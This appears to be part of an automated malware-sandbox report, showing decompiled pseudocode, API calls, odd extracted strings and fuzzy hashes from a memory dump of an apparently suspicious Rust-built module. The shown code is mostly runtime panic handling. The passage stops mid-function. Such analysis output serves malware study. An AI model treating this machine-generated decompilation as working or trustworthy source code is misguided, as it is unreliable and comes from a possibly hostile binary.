
Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C6D0, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6EA8C6D0(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6EA939A0;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6ead01dc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6eade120], esi");
				_t193 = E6EA8D000(_t268, 0x6ead01dc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6EAA95A0(_t268,  &M6EACF8F7, 0x46, _t349,  &_v68, 0x6eacf870, 0x6eacf9bc);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6eacf570;
						_v120 = 0x6eacf824;
						_v68 = 0x6ead0260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6EA82470;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6EA8D0F0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6eade128, 0, _t259);
							}
							_t197 = HeapFree( *0x6eade128, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6ead0224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6eacf570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6EA8D0F0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6eade11c);
					_v144 = 0x6eade11c;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6EA8D000(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6eade110; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6EA8D380(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6EAA95A0(_t268,  &M6EACF8F7, 0x46, _t352,  &_v68, 0x6eacf870, 0x6eacf9bc);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6eadd044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6eadd044;
							_t205 = E6EA92960(_t268, 0x6eadd044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6eadd044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6eadd044;
								_t206 = E6EA92960(_t268, 0x6eadd044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6eade128; // 0x2d40000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6eadd044;
										_t340 = _t208;
										_t209 =  *0x6eadd044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6EA92960(_t268, 0x6eadd044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6EAA92F0(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6eade128, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6eade110;
											 *0x6eade110 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6ea93290
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6eade128 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6EA8C640(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6EAA95A0(_t268, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6eacf860, 0x6eacff30);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6EA8C4D0(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6EA8C640(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									__eflags = _t285;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6ead010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ea8dca0;
										_v60 =  &_v100;
										_v56 = 0x6ea8dca0;
										_v52 =  &_v148;
										_v48 = E6EA8DCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6EA8D0F0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6eade128, 0, _t248);
											}
											HeapFree( *0x6eade128, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6eade10c);
											_v68 = 0x6eacfad0;
											_v64 = 1;
											_v152 = 0x6eade10c;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6EA8DD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6EA8D0F0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6eade10c);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6EA8C640(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6EA8DA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6eade11c);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ead029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6eacf570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6EA8D0F0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6EA8D2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6EA8D290(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6eadd040 = 0;
											_t368 =  *0x6eadd040;
											if( *0x6eadd040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6ead017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6eacf570;
											_v48 = 0;
											_v20 = 3;
											if(E6EA8D0F0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6eade128, 0, _t238);
											}
											HeapFree( *0x6eade128, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

0x6ea8c6d7
0x6ea8c6da
0x6ea8c6de
0x6ea8c6e5
0x6ea8c6e6
0x6ea8c6e8
0x6ea8c6ed
0x6ea8c6f0
0x6ea8c6f2
0x6ea8c6f3
0x6ea8c6f4
0x6ea8c6f5
0x6ea8c6f6
0x6ea8c6f7
0x6ea8c6f8
0x6ea8c6f9
0x6ea8c6fa
0x6ea8c6fb
0x6ea8c6fc
0x6ea8c6fd
0x6ea8c6fe
0x6ea8c6ff
0x6ea8c706
0x6ea8c70c
0x6ea8c70f
0x6ea8c716
0x6ea8c71d
0x6ea8c722
0x6ea8c727
0x6ea8c730
0x6ea8c733
0x6ea8c739
0x6ea8c741
0x6ea8c746
0x6ea8c748
0x6ea8c762
0x6ea8c767
0x6ea8c76a
0x6ea8c76a
0x6ea8c76e
0x6ea8c771
0x6ea8c774
0x6ea8c776
0x6ea8c7ea
0x6ea8c7ed
0x6ea8c84a
0x6ea8c851
0x6ea8c85b
0x6ea8c862
0x6ea8c869
0x6ea8c86d
0x6ea8c874
0x6ea8c87b
0x6ea8c881
0x6ea8c884
0x6ea8c887
0x6ea8c88d
0x6ea8c894
0x6ea8c897
0x6ea8c89e
0x6ea8c8a3
0x6ea8c8a5
0x6ea8c8ac
0x6ea8c8b4
0x6ea8c8b7
0x6ea8c8b9
0x6ea8c8bc
0x6ea8c8bc
0x6ea8c8bf
0x6ea8c8c2
0x6ea8c8c6
0x6ea8c8dc
0x6ea8c8dc
0x6ea8c8ea
0x6ea8c8ea
0x00000000
0x6ea8c8a5
0x6ea8c7f2
0x6ea8c7f5
0x6ea8c7fc
0x6ea8c803
0x6ea8c80a
0x6ea8c811
0x6ea8c815
0x6ea8c81c
0x6ea8c823
0x6ea8c828
0x6ea8c82a
0x00000000
0x6ea8c830
0x6ea8c835
0x6ea8c83d
0x6ea8c840
0x6ea8c842
0x00000000
0x6ea8c842
0x6ea8c77d
0x6ea8c77d
0x6ea8c785
0x6ea8c78b
0x6ea8c795
0x6ea8c79c
0x6ea8c7a3
0x6ea8c7a9
0x6ea8c7ac
0x6ea8c7af
0x6ea8c7b2
0x6ea8c7b5
0x6ea8c7ba
0x6ea8c7bd
0x6ea8c7bf
0x6ea8c8f3
0x6ea8c8f3
0x6ea8c8f6
0x6ea8c8f8
0x6ea8c9cb
0x6ea8c9d0
0x6ea8c9d3
0x6ea8c9d6
0x6ea8cbd7
0x00000000
0x6ea8cbd7
0x6ea8c9dc
0x6ea8c9df
0x6ea8cbd0
0x00000000
0x6ea8cbd0
0x6ea8c9e5
0x6ea8c9e7
0x00000000
0x00000000
0x6ea8c9f0
0x6ea8c9f5
0x6ea8c9f8
0x6ea8c9fb
0x6ea8c9fd
0x00000000
0x00000000
0x6ea8ca03
0x00000000
0x6ea8ca03
0x6ea8c8fe
0x00000000
0x6ea8c7c5
0x6ea8c7dd
0x6ea8c7e2
0x6ea8cbfe
0x6ea8cbfe
0x6ea8cc00
0x6ea8cc00
0x6ea8cc05
0x6ea8c933
0x6ea8c933
0x6ea8c936
0x6ea8c939
0x6ea8c940
0x6ea8c942
0x6ea8c947
0x6ea8c947
0x6ea8c94d
0x6ea8c956
0x6ea8ca33
0x6ea8ca33
0x6ea8ca38
0x6ea8ca3a
0x6ea8ca3c
0x6ea8ca41
0x6ea8ca41
0x6ea8ca47
0x6ea8ca4d
0x6ea8ca4f
0x6ea8cc0f
0x6ea8cc14
0x6ea8cc16
0x6ea8cc26
0x6ea8cc2b
0x6ea8cc30
0x6ea8cc32
0x6ea8cc72
0x6ea8cc78
0x6ea8cc7f
0x6ea8cc81
0x6ea8cc86
0x6ea8cc88
0x6ea8cc8f
0x6ea8cc92
0x6ea8cc97
0x6ea8cc97
0x6ea8cc9c
0x00000000
0x6ea8cc9c
0x6ea8cc34
0x6ea8cc3e
0x6ea8cc43
0x6ea8cc45
0x6ea8cc45
0x6ea8cc48
0x6ea8cc4b
0x6ea8cc4e
0x6ea8ccf8
0x6ea8ccfe
0x6ea8cd09
0x6ea8cd09
0x6ea8cd0e
0x6ea8cd0e
0x6ea8cd10
0x6ea8cd10
0x6ea8cd12
0x6ea8cd1d
0x6ea8cd1d
0x6ea8cd22
0x6ea8cd22
0x6ea8cd2d
0x6ea8cd35
0x6ea8cd38
0x6ea8cd3b
0x6ea8cd3b
0x6ea8cd3b
0x6ea8c901
0x6ea8c901
0x6ea8c907
0x6ea8c90a
0x6ea8c90a
0x6ea8c910
0x6ea8c913
0x6ea8c915
0x6ea8c923
0x6ea8c923
0x6ea8c925
0x6ea8ca0d
0x6ea8ca10
0x6ea8ca1e
0x6ea8ca20
0x00000000
0x00000000
0x6ea8ca26
0x6ea8ca29
0x6ea8ca2b
0x00000000
0x6ea8ca2b
0x6ea8c92b
0x6ea8c92e
0x6ea8c930
0x00000000
0x6ea8c930
0x6ea8cd00
0x6ea8cd02
0x00000000
0x6ea8cd02
0x6ea8cc54
0x6ea8cc57
0x00000000
0x00000000
0x6ea8cc5d
0x6ea8cc60
0x00000000
0x00000000
0x6ea8cc66
0x6ea8cc68
0x00000000
0x6ea8cc68
0x6ea8cc18
0x6ea8cc1d
0x6ea8cc1f
0x00000000
0x00000000
0x6ea8cc21
0x00000000
0x6ea8ca55
0x6ea8ca55
0x6ea8ca57
0x6ea8ca5a
0x6ea8cca2
0x6ea8cca2
0x6ea8cca5
0x6ea8cca8
0x6ea8cca8
0x6ea8ccab
0x6ea8ccb1
0x6ea8ccb8
0x6ea8ccbf
0x6ea8ccc5
0x6ea8ccc7
0x6ea8cccd
0x6ea8ccd0
0x6ea8ccd6
0x6ea8ccd6
0x6ea8ccd0
0x6ea8ccc7
0x00000000
0x6ea8ccbf
0x6ea8ca60
0x6ea8ca67
0x6ea8ca6e
0x6ea8ca6e
0x00000000
0x6ea8ca6e
0x6ea8c95c
0x6ea8c95f
0x6ea8c961
0x00000000
0x00000000
0x6ea8c967
0x6ea8c96a
0x6ea8c96d
0x6ea8cbf6
0x6ea8cbfb
0x00000000
0x6ea8cbfb
0x6ea8c973
0x6ea8c979
0x6ea8c97e
0x6ea8c980
0x6ea8c983
0x6ea8c98a
0x6ea8c98f
0x6ea8c992
0x6ea8c994
0x6ea8c997
0x6ea8c999
0x6ea8c99b
0x6ea8c99e
0x6ea8c9a0
0x6ea8c9a3
0x6ea8c9a3
0x6ea8c99e
0x6ea8c9a8
0x6ea8c9a8
0x6ea8c9ab
0x6ea8c9ae
0x6ea8c8ef
0x6ea8c8ef
0x6ea8c8f1
0x00000000
0x6ea8c9b4
0x6ea8c9b4
0x6ea8c9b8
0x6ea8c9bb
0x6ea8c9be
0x6ea8cce0
0x6ea8cce6
0x6ea8cce8
0x6ea8cce8
0x6ea8cceb
0x6ea8cea2
0x6ea8cea2
0x6ea8cea7
0x6ea8cea8
0x6ea8cea8
0x6ea8ca70
0x6ea8ca77
0x6ea8ca7e
0x6ea8ca85
0x6ea8ca8c
0x6ea8ca90
0x6ea8ca97
0x6ea8ca9e
0x6ea8caa5
0x6ea8caad
0x6ea8cab0
0x6ea8cab6
0x6ea8cab9
0x6ea8cabf
0x6ea8cac5
0x6ea8cacc
0x6ea8cad5
0x6ea8cadc
0x6ea8cae2
0x6ea8cae9
0x6ea8caec
0x6ea8cafa
0x6ea8cb01
0x6ea8cb09
0x6ea8cb0c
0x6ea8cb0e
0x6ea8cb11
0x6ea8cb14
0x6ea8cb1b
0x6ea8cb1d
0x6ea8cb23
0x6ea8cb25
0x6ea8cb25
0x6ea8cb31
0x6ea8cb31
0x6ea8cb3f
0x6ea8cb3f
0x6ea8cb44
0x6ea8cb55
0x6ea8cb5a
0x6ea8cd4b
0x6ea8cd5a
0x6ea8cd61
0x6ea8cd68
0x6ea8cd72
0x6ea8cd75
0x6ea8cd7c
0x6ea8cd83
0x6ea8cd89
0x6ea8cd90
0x6ea8cd93
0x6ea8cd9a
0x6ea8cd9f
0x6ea8cda8
0x6ea8cdae
0x6ea8cdb1
0x00000000
0x00000000
0x6ea8cdb8
0x6ea8cdc0
0x6ea8cdc3
0x6ea8cdc5
0x00000000
0x6ea8cb60
0x6ea8cb63
0x6ea8ce00
0x6ea8ce03
0x6ea8ce05
0x6ea8ce07
0x6ea8ce0a
0x6ea8ce0f
0x6ea8ce0f
0x6ea8ce0a
0x6ea8ce17
0x6ea8ce1d
0x6ea8ce23
0x6ea8ce25
0x6ea8ce27
0x6ea8ce2a
0x6ea8ce2f
0x6ea8ce2f
0x6ea8ce2a
0x6ea8ce39
0x6ea8ce3f
0x6ea8ce43
0x6ea8ce4a
0x6ea8ce52
0x6ea8ce59
0x6ea8ce60
0x6ea8ce67
0x6ea8ce6e
0x6ea8ce72
0x6ea8ce79
0x6ea8ce80
0x6ea8ce88
0x6ea8ce8b
0x6ea8ce8e
0x6ea8ce93
0x6ea8ce95
0x6ea8ce95
0x6ea8ce97
0x6ea8ce9b
0x6ea8cea0
0x00000000
0x6ea8cea0
0x6ea8cb6b
0x6ea8cb71
0x6ea8cb73
0x00000000
0x00000000
0x6ea8cb7c
0x6ea8cb7f
0x6ea8cb86
0x6ea8cb8d
0x6ea8cb94
0x6ea8cb9b
0x6ea8cba2
0x6ea8cbb0
0x00000000
0x00000000
0x6ea8cbbb
0x6ea8cbbe
0x6ea8cbc6
0x6ea8cbc8
0x6ea8cdc8
0x6ea8cdcb
0x6ea8cdd2
0x6ea8cddb
0x6ea8cddd
0x6ea8cddf
0x6ea8cddf
0x6ea8cdeb
0x6ea8cdeb
0x6ea8cdfb
0x00000000
0x6ea8cdfb
0x6ea8cb5a
0x6ea8ccf1
0x00000000
0x6ea8ccf1
0x6ea8c9c4
0x00000000
0x6ea8c9c4
0x6ea8c9ae
0x6ea8c956
0x6ea8c7bf

APIs

Part of subcall function 6EA8C700: AcquireSRWLockShared.KERNEL32(6EADE11C), ref: 6EA8C785

HeapFree.KERNEL32(00000000,00000000), ref: 6EA8C8DC
HeapFree.KERNEL32(00000000,?), ref: 6EA8C8EA
TlsGetValue.KERNEL32(00000000), ref: 6EA8C94D
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8CB31
HeapFree.KERNEL32(00000000,?), ref: 6EA8CB3F

Strings

Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6EA8CC00
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6EA8C74D, 6EA8C7C8

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AcquireLockSharedValue
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
API String ID: 942675266-716947571
Opcode ID: b28ee44d05aef9b3c8a812dfb4b2ee197767f3e46a7f33fb147f6065af2736f3
Instruction ID: 364c3b990f4c3203740dc521a491d1b06ec9184bb0114412a9ac3bffec9f411d
Opcode Fuzzy Hash: b28ee44d05aef9b3c8a812dfb4b2ee197767f3e46a7f33fb147f6065af2736f3
Instruction Fuzzy Hash: F30256B0E002199FDB10CFE4C994B9EBBF5BF49304F208659D415AF280D775A986CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9F6F6, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6EA9F6F6(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6EAA0658(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6EAA1C23(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6EA9F3B1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6EA9F3B1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
